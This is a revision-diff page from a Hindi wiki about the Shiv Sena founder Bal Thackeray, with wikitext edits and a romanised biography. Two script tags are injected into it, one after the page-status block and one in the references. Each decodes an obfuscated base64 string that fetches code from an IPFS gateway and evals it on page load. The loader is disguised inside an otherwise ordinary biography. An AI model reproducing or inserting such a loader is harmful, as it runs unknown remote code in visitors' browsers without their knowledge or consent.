Difference between revisions of "बाल ठाकरे"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''बालासाहेब केशव ठाकरे''' (जन्म: 23 जनवरी, 1926 - मृत्यु: 17 नवं...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''बालासाहेब केशव ठाकरे''' (जन्म: 23 जनवरी, 1926 - मृत्यु: 17 नवंबर, 2012) [[भारत]] के [[महाराष्ट्र]] प्रदेश के प्रसिद्ध राजनेता थे। उन्होंने [[शिव सेना]] नामक हिन्दू राष्ट्रवादी दल का गठन किया।
+
{{सूचना बक्सा राजनीतिज्ञ
 +
|चित्र=Bal thackeray.jpg
 +
|चित्र का नाम=बाल ठाकरे
 +
|पूरा नाम=बालासाहेब केशव ठाकरे
 +
|अन्य नाम=
 +
|जन्म=[[23 जनवरी]], [[1926]]
 +
|जन्म भूमि=[[पुणे]], [[महाराष्ट्र]]
 +
|मृत्यु=[[17 नवंबर]], [[2012]]
 +
|मृत्यु स्थान=[[मुम्बई]], महाराष्ट्र
 +
|मृत्यु कारण=दिल का दौरा
 +
|अविभावक=पिता- केशव सीताराम ठाकरे
 +
|पति/पत्नी=मीना ठाकरे
 +
|संतान=तीन पुत्र (स्‍वर्गीय बिंदुमाधव, जयदेव और उद्धव ठाकरे)
 +
|स्मारक=
 +
|क़ब्र=
 +
|नागरिकता=भारतीय
 +
|प्रसिद्धि=
 +
|पार्टी=[[शिव सेना]]
 +
|पद=
 +
|भाषा=[[मराठी भाषा|मराठी]]
 +
|जेल यात्रा=
 +
|कार्य काल=
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|विशेष योगदान=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=बाल ठाकरे शिव सेना के मुखपत्र मराठी अख़बार 'सामना' और हिन्‍दी अख़बार 'दोपहर का सामना' के संस्थापक थे।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''बालासाहेब केशव ठाकरे''' (जन्म: 23 जनवरी, 1926 - मृत्यु: 17 नवंबर, 2012) [[भारत]] के [[महाराष्ट्र]] राज्य के प्रसिद्ध राजनेता थे। उन्होंने [[शिव सेना]] नामक हिन्दू राष्ट्रवादी दल का गठन किया।
 
==जीवन परिचय==
 
==जीवन परिचय==
 
बाल ठाकरे का जन्‍म तत्‍कालीन बॉम्‍बे रेजिडेंसी के [[पुणे]] में [[23 जनवरी]] [[1926]] को एक मराठी परिवार में हुआ था। बाल ठाकरे का जन्‍म नाम बाल केशव ठाकरे था। बालासाहब ठाकरे और हिंदू हृदय सम्राट के नाम से भी उन्‍हें जाना जाता है। बाल ठाकरे हिंदूवादी राजनीति पार्टी 'शिव सेना' के संस्थापक हैं। उनकी पार्टी की महाराष्ट्र में अच्‍छी पकड़ है और बाहरी लोगों के विरोध के कारण उन्‍हें ज्‍यादा पहचान मिली।<ref name="आजतक">{{cite web |url=http://aajtak.intoday.in/story/profile-bal-thackrey-1-713190.html |title=हिंदू हृदय सम्राट कहलाते हैं बाल ठाकरे |accessmonthday=17 नवम्बर |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=आजतक |language= हिन्दी}}</ref>  
 
बाल ठाकरे का जन्‍म तत्‍कालीन बॉम्‍बे रेजिडेंसी के [[पुणे]] में [[23 जनवरी]] [[1926]] को एक मराठी परिवार में हुआ था। बाल ठाकरे का जन्‍म नाम बाल केशव ठाकरे था। बालासाहब ठाकरे और हिंदू हृदय सम्राट के नाम से भी उन्‍हें जाना जाता है। बाल ठाकरे हिंदूवादी राजनीति पार्टी 'शिव सेना' के संस्थापक हैं। उनकी पार्टी की महाराष्ट्र में अच्‍छी पकड़ है और बाहरी लोगों के विरोध के कारण उन्‍हें ज्‍यादा पहचान मिली।<ref name="आजतक">{{cite web |url=http://aajtak.intoday.in/story/profile-bal-thackrey-1-713190.html |title=हिंदू हृदय सम्राट कहलाते हैं बाल ठाकरे |accessmonthday=17 नवम्बर |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=आजतक |language= हिन्दी}}</ref>  
 
==कॅरियर की शुरुआत==
 
==कॅरियर की शुरुआत==
बाल ठाकरे ने अपने कॅरियर की शुरुआत [[मुंबई]] के एक अंग्रेज़ी दैनिक 'द फ्री प्रेस जर्नल' के साथ एक कार्टूनिस्‍ट के रूप में की। 1960 में बाल ठाकरे ने कार्टूनिस्‍ट की यह नौकरी छोड़ दी और अपना राजनीतिक साप्‍ताहिक अखबार मार्मिक निकाला। बाल ठाकरे के कार्टून 'टाइम्‍स ऑफ इंडिया' में भी हर [[रविवार]] को छपा करते थे। उनका राजनीतिक दर्शन उनके पिता से प्रभावित है। उनके पिता केशव सीताराम ठाकरे 'संयुक्‍त महाराष्‍ट्र मूवमेंट' के जाने-पहचाने व्यक्ति थे। बाल ठाकरे के पिता केशव सीताराम ठाकरे ने भाषायी आधार पर महाराष्‍ट्र राज्‍य के निर्माण में अच्‍छा योगदान दिया। 'मार्मिक' के माध्‍यम से बाल ठाकरे ने मुंबई में गुजरातियों, मारवाडियों और दक्षिण भारतीय लोगों के बढ़ते प्रभाव के खिलाफ मुहिम चलायी।<ref name="आजतक"/>
+
बाल ठाकरे ने अपने कॅरियर की शुरुआत [[मुंबई]] के एक अंग्रेज़ी दैनिक 'द फ्री प्रेस जर्नल' के साथ एक कार्टूनिस्‍ट के रूप में की। 1960 में बाल ठाकरे ने कार्टूनिस्‍ट की यह नौकरी छोड़ दी और अपना राजनीतिक साप्‍ताहिक अख़बार मार्मिक निकाला। बाल ठाकरे के कार्टून 'टाइम्‍स ऑफ इंडिया' में भी हर [[रविवार]] को छपा करते थे। उनका राजनीतिक दर्शन उनके पिता से प्रभावित है। उनके पिता केशव सीताराम ठाकरे 'संयुक्‍त महाराष्‍ट्र मूवमेंट' के जाने-पहचाने व्यक्ति थे। बाल ठाकरे के पिता केशव सीताराम ठाकरे ने भाषायी आधार पर महाराष्‍ट्र राज्‍य के निर्माण में अच्‍छा योगदान दिया। 'मार्मिक' के माध्‍यम से बाल ठाकरे ने मुंबई में गुजरातियों, मारवाडियों और दक्षिण भारतीय लोगों के बढ़ते प्रभाव के खिलाफ मुहिम चलायी।<ref name="आजतक"/>
  
 
=='शिव सेना' का गठन==
 
=='शिव सेना' का गठन==
1966 में बाल ठाकरे ने मुंबई के राजनीतिक और व्‍यावसायिक परिदृष्‍य पर महाराष्‍ट्र के लोगों के अधिकार के लिए राजनीतिक पार्टी 'शिव सेना' का गठन किया। बाल ठाकरे शिव सेना के मुखपत्र मराठी अखबार 'सामना' और हिन्‍दी अखबार 'दोपहर का सामना' के संस्थापक थे।  
+
1966 में बाल ठाकरे ने मुंबई के राजनीतिक और व्‍यावसायिक परिदृष्‍य पर महाराष्‍ट्र के लोगों के अधिकार के लिए राजनीतिक पार्टी 'शिव सेना' का गठन किया। बाल ठाकरे शिव सेना के मुखपत्र मराठी अख़बार 'सामना' और हिन्‍दी अख़बार 'दोपहर का सामना' के संस्थापक थे।  
  
 
==परिवार==
 
==परिवार==
Line 12: Line 47:
  
 
==निधन==
 
==निधन==
कई दिनों से गंभीर रूप से बीमार रहे शिवसेना प्रमुख बाल ठाकरे का 86 वर्ष की उम्र में 17 नवंबर, 2012 को निधन हो गया। दोपहर साढ़े तीन बजे के क़रीब बाला साहब ठाकरे ने अंतिम सांस ली। चिकित्सकों के मुताबिक दिल का दौरा पड़ने से ठाकरे का निधन हुआ।
+
कई दिनों से गंभीर रूप से बीमार रहे शिवसेना प्रमुख बाल ठाकरे का 86 वर्ष की उम्र में [[17 नवंबर]], [[2012]] को निधन हो गया। दोपहर साढ़े तीन बजे के क़रीब बाला साहब ठाकरे ने अंतिम सांस ली। चिकित्सकों के मुताबिक दिल का दौरा पड़ने से ठाकरे का निधन हुआ।
  
  
Line 23: Line 58:
 
==संबंधित लेख==
 
==संबंधित लेख==
  
 
+
[[Category:राजनीतिज्ञ]]
 
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
 
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
 
[[Category:राजनेता]][[Category:राजनीति कोश]]
 
[[Category:राजनेता]][[Category:राजनीति कोश]]

Revision as of 14:14, 17 November 2012

bal thakare
poora nam balasaheb keshav thakare
janm 23 janavari, 1926
janm bhoomi pune, maharashtr
mrityu 17 navanbar, 2012
mrityu sthan mumbee, maharashtr
mrityu karan dil ka daura
pati/patni mina thakare
santan tin putr (sh‍vargiy biandumadhav, jayadev aur uddhav thakare)
nagarikata bharatiy
parti shiv sena
bhasha marathi
any janakari bal thakare shiv sena ke mukhapatr marathi akhabar 'samana' aur hinh‍di akhabar 'dopahar ka samana' ke sansthapak the.

balasaheb keshav thakare (janm: 23 janavari, 1926 - mrityu: 17 navanbar, 2012) bharat ke maharashtr rajy ke prasiddh rajaneta the. unhoanne shiv sena namak hindoo rashtravadi dal ka gathan kiya.

jivan parichay

bal thakare ka janh‍m tath‍kalin b aaumh‍be rejideansi ke pune mean 23 janavari 1926 ko ek marathi parivar mean hua tha. bal thakare ka janh‍m nam bal keshav thakare tha. balasahab thakare aur hiandoo hriday samrat ke nam se bhi unh‍hean jana jata hai. bal thakare hiandoovadi rajaniti parti 'shiv sena' ke sansthapak haian. unaki parti ki maharashtr mean achh‍chhi pak d hai aur bahari logoan ke virodh ke karan unh‍hean jh‍yada pahachan mili.[1]

kॅriyar ki shuruat

bal thakare ne apane kॅriyar ki shuruat muanbee ke ek aangrezi dainik 'd phri pres jarnal' ke sath ek kartoonish‍t ke roop mean ki. 1960 mean bal thakare ne kartoonish‍t ki yah naukari chho d di aur apana rajanitik saph‍tahik akhabar marmik nikala. bal thakare ke kartoon 'taimh‍s aauph iandiya' mean bhi har ravivar ko chhapa karate the. unaka rajanitik darshan unake pita se prabhavit hai. unake pita keshav sitaram thakare 'sanyukh‍t maharashh‍tr moovameant' ke jane-pahachane vyakti the. bal thakare ke pita keshav sitaram thakare ne bhashayi adhar par maharashh‍tr rajh‍y ke nirman mean achh‍chha yogadan diya. 'marmik' ke madhh‍yam se bal thakare ne muanbee mean gujaratiyoan, maravadiyoan aur dakshin bharatiy logoan ke badhate prabhav ke khilaph muhim chalayi.[1]

'shiv sena' ka gathan

1966 mean bal thakare ne muanbee ke rajanitik aur vh‍yavasayik paridrishh‍y par maharashh‍tr ke logoan ke adhikar ke lie rajanitik parti 'shiv sena' ka gathan kiya. bal thakare shiv sena ke mukhapatr marathi akhabar 'samana' aur hinh‍di akhabar 'dopahar ka samana' ke sansthapak the.

parivar

bal thakare ki path‍ni ka nam mina thakare tha, jinaka 1996 mean dehaant ho gaya. unake tin bete sh‍vargiy biandumadhav, jayadev aur uddhav thakare haian. unake b de bete biandumadhav thakare ki ek s dak durghatana mean 20 aprail 1996 ko muanbee-pune eksapres ve par maut ho gee thi.[1]

nidhan

kee dinoan se ganbhir roop se bimar rahe shivasena pramukh bal thakare ka 86 varsh ki umr mean 17 navanbar, 2012 ko nidhan ho gaya. dopahar sadhe tin baje ke qarib bala sahab thakare ne aantim saans li. chikitsakoan ke mutabik dil ka daura p dane se thakare ka nidhan hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 hiandoo hriday samrat kahalate haian bal thakare (hindi) (ech.ti.em.el) ajatak. abhigaman tithi: 17 navambar, 2012.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh